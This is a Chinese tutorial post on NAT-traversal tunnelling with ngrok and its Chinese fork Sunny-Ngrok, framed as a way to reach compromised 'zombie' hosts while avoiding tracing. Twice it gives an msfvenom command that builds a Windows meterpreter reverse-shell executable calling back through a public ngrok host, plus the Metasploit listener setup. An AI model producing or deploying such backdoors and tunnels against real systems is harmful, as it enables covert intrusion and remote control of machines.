【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)

news2024/12/28 20:10:55

目录

一、准备

1、意义:

2、项目:

二、内网穿透

1、简介:

三、Ngrok(入门上线)

1、简述:

2、Ngrok入门上线(国版二开)

3、相关工具:

 2、Ngrok入门上线(美版)



一、准备

1、意义:

在代理连接肉鸡后实现本地渗透肉鸡网络架构


2、项目:

Linux:Proxychains
Windows:Sockscap Proxifier
穿透项目:Ngrok Frp Spp Nps EW(停更)
优点:穿透加密数据,中间平台,防追踪,解决网络问题
https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm



二、内网穿透

1、简介:

1、内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。


2、UDP 内网穿透的实质是利用路由器上的NAT 系统。NAT 是一种将私有(保留)地址转化为合法IP地址转换技术,它被广泛应用于各种类型 Internet 接入方式和各种类型的网络中。NAT可以完成重用地址,并且对于内部的网络结构可以实现对外隐蔽
(来源百度百科)



三、Ngrok(入门上线)

1、简述:

1)作用:ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。通过一个命令,便可将一个本地服务器暴露在NAT或防火墙后面的互联网。


2)官方解释:ngrok是一个简化的API优先入口即服务,它增加了连接性, 无需更改代码即可对您的应用程序进行安全性和可观察性


3)我的理解:

关键词:反向代理、公共、本地

通过反向代理,将局域网内的ip:port,转化为任何用户上网都可访问的URL一样

本地--->Ngrok服务器--->客户端


3)分析:

支持的协议:tcp、http、https
支持的类型:正向代理、反向代理


4)工具官网(美国的):

ngrok - Online in One Linengrok is the fastest way to put anything onthe internet with a single command.https://ngrok.com/


5)国产二开的管理平台:

Sunny-Ngrok

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器https://www.ngrok.cc/

2、Ngrok入门上线(国版二开)

1)注册并登陆:

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

点击进行注册(免费的)


2)服务端配置:
实名认证--->开通隧道--->TCP协议--->指向IP和端口--->开通隧道--->连接隧道

——————

实名认证(2块钱就可了)

填写相关信息

 使用支付宝扫码,进行人脸识别

——————

开通隧道(先拿0元的试手)

——————

TCP协议--->域名进行设置--->指向IP和端口--->添加隧道--->确认开通

注意:

本地端口的填写,12.0.0.1代表localhost,紧接着的端口号是tomcat的端口号(可查看tomcat的server.xml文件中端口)

 


3)连接隧道:

下载客户端

 根据自己的下载合适的ngrok客户端

 打开ngrok客户端

输入需要启动的隧道id

实现本地的网站,可以映射到外网了


4)客户端生成后门配置监听:

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe

:lhos:外网ip、lport:外网端口)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

:这个监听端口lport,与本地转发端口一致)

3、相关工具:

1)natapp

NATAPP -https://natapp.cn/tunnel/buy基本类似使用

2、Ngrok入门上线(美版)

1)下载:

ngrok - downloadhttps://ngrok.com/download


2)运行ngrok.exe


3)在Ngrok官网 注册账号

ngrok - Online in One Linehttps://ngrok.com/在用户中心找到authtoken(账户凭证)


方法一:

4)在ngrok命令行中输入:

ngrok authtoken 加上自己的凭据

配置成功会如下提示:
(创建.ngrok2文件夹、配置文件ngrok.yml)
Authtoken saved to configuration file: C:\Users\****/.ngrok2/ngrok.yml

5)连接隧道:

ngrok http 80
(指定的tcp协议,以及自己的服务端口)

方法二:

4*)配置账户

ngrok config add-authtoken 加上自己的凭据

5*)连接隧道

ngrok http 80
(指定的tcp协议,以及自己的服务端口)

6)客户端生成后门配置监听:
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe

:lhos:外网ip、lport:外网端口)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

:这个监听端口lport,与本地转发端口一致)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/197010.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

低代码开发平台|SRM-招投标管理搭建指南

1、简介1.1、案例简介本文将介绍,如何搭建SRM-招投标管理。1.2、应用场景企业根据采购需求创建招投标需求,选择供应商进行邀标,供应商报名再投标,投标结束评标人员对投标项目进行评估。2、设置方法2.1、表单搭建1)新建…

Python build Exe 使用PyInstaller创建可执行的Python脚本

在本指南中,您将看到如何使用PyInstaller创建Python脚本的可执行文件? 下面是在Windows中实现这一目标的完整步骤。 使用PyInstaller创建可执行文件的步骤 步骤1:添加Python到Windows路径 首先,您可能想要将Python添加到Windows路径。 将Python添加到…

Spring Boot整合Redis笔记

文章目录前言Java 操作 RedisJedis 操作-测试Jedis 实例-手机验证码Redis与Spring Boot整合整合步骤Redis 的事务操作Redis的事务定义Multi、Exec、discard 基本命令事务冲突的问题为什么要做成事务悲观锁乐观锁WATCH key [key ... ]Redis事务三特性Redis事务秒杀案例解决计数器…

分布式定时任务-XXL-JOB-教程+实战

一.定时任务概述 1.定时任务认识 1.1.什么是定时任务 定时任务是按照指定时间周期运行任务。使用场景为在某个固定时间点执行,或者周期性的去执行某个任务,比如:每天晚上24点做数据汇总,定时发送短信等。 1.2.常见定时任务方案…

docker-compose容器编排部署

docker-compose部署微服务1、Docker-Compose是什么?2、应用场景3、docker-compose部署SpringBoot项目3.1 编写Dockfile3.2 编写docker-compose.yaml3.3 修改工程配置3.4 将相关文件上传到服务器3.5 执行docker-compose up本文是对DockerNginx打包部署前后端分离项目…

E5061B矢量网络分析仪VNA概念

矢量网络分析仪VNA是一种测试仪器,它可以将网络的响应测量成矢量:实参数和虚参数,从而表征其性能。矢量网络分析仪VNA是射频设计实验室和许多制造和服务领域的重要测试仪器。虽然矢量网络分析仪主要侧重于研究和开发,但它也可以为所有类型的R…

2月3日 读书笔记

我们将程序改善一下,让程序在按下一个键后不结束,而是把所按键的编码在画面上显示出来,这样就可以切实完成中断处理程序了。 所谓中断处理,基本上就是打断CPU本来的工作,加塞要求进行处理。而且处理中断期间不再接收别…

创业30载,百亿市值奥瑞金未来可期

1994年,关玉香在海南文昌破土兴建海南奥瑞金包装实业有限公司(原名:文昌奥瑞金制罐公司),与儿子周云杰一起带领着16名工人进入了金属包装行业,从0到如今的百亿市值,就此拉开了一路“封神”的序幕…

字符串(一)BF算法与KMP算法

给一个主串s,在给一个子串substr,判断substr是否为s的子串 一、BF 暴力搜索 暴力,依次逐个比较字符,先从主串和模式串的第一个字符开始,如果相等一起比较下一个字符,如果不相等,那么重新回到模…

PTA L1-032 Left-pad(详解)

前言:本期是关于L1-032 Left-pad的详解,内容包括四大模块:题目,代码实现,大致思路,代码解读,今天你c了吗? 题目: 根据新浪微博上的消息,有一位开发者不满NPM…

SpringCloud Alibaba—— 微服务网关GateWay

目录 1、GateWay网关概述 1.1、什么是GateWay? 1.2、为什么要使用微服务网关? 1.3、Zuul与GateWay网关的区别? 2、快速入门 2.1、创建项目 2.2、配置yml文件 2.3、controller层 2.4、启动类 2.5、启动整体项目 2.6、配置全局过滤器…

代码随想录算法训练营第十七天 | 110.平衡二叉树,257. 二叉树的所有路径,404.左叶子之和

一、昨日回顾与补充今天看了Day16讲解的视频,对于求二叉树最大深度、最小深度以及求完全二叉树的节点个数有了新的理解,总结如下:1.深度和高度的区别(之前就看看定义忽略了)二叉树节点的深度:指从根节点到该…

jvm垃圾收集器有哪些

Serial收集器 Serial收集器是最基本,发展最悠久的收集器,在JDK1.3.1之前是虚拟机新生代垃圾回收的唯一选择。这个收集器是一个单线程的。它的单线程的意义并不仅仅说明它只会使用一个CPU或者一条收集线程去完成收集工作,最重要的是&#xff…

量化选股股票和量化交易的两者有什么区别?

最近a股在频繁波动后终于开始走强。近几个月来,一些净值明显下降的量化产品业绩终于实现了阶段性回升。与此同时,根据金融终端,量化私募管理的规模已经超过1万亿元。面对目前市场上大量超额收益和大幅波动带来的不合理定价带来的收益&#xf…

磨金石教育摄影技能干货分享|春节街拍欣赏:大街上的年味

当然还有很多人依然沉浸在过年的喜庆氛围中,我们一般把除夕到十五这个期间段都归入春节期间。在这个时间段内街道上都是喜庆的氛围热热闹闹,年味十足。过了除夕之后,春节娱乐的主题除了走亲访友,就是出行了。春节小长假&#xff0…

jmeter脚本处理加密验签

一 、账号密码加密 1.1 背景: 一个登录接口,账号是明文传输,但是密码要先经过加密,再做传输。 比如: 一个用户,账号为123465 密码为 abcde 实际上登录接口,请求,传参为 账号 1…

使用傅里叶级数展开法从谐波的和中产生方波(Matlab代码实现)

目录 💥1 概述 📚2 运行结果 🎉3 参考文献 👨‍💻4 Matlab代码 💥1 概述 谐波是指对周期性非正弦交流量进行傅里叶级数分解所得到的大于基波频率整数倍的各次分量,通常称为高次谐波&#xf…

C++11 可变参数模板

作者:小萌新 专栏:C进阶 作者简介:大二学生 希望能和大家一起进步! 本篇博客简介:介绍C11的可变参数模板 可变参数模板可变参数模板的概念可变参数模板的定义方式参数包两种解开方式递归展开参数包逗号表达式展开参数包…

Springboot在线考试管理系统

一、项目简介 本项目是一套基于Springboot在线考试管理系统,主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的Java学习者。 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,…

java基于springboot+vue的校园跑腿系统

随着我国教育制度的改革的发展,各大高校的学生数量也在不断的增加。当前大学生的生活和消费习惯等导致他们更喜欢通过网络来获取自己想要的商品和服务,这也是导致当前校园跑腿盛行的主要原因。为了能够让更多的学生享受到校园跑腿的服务,我们…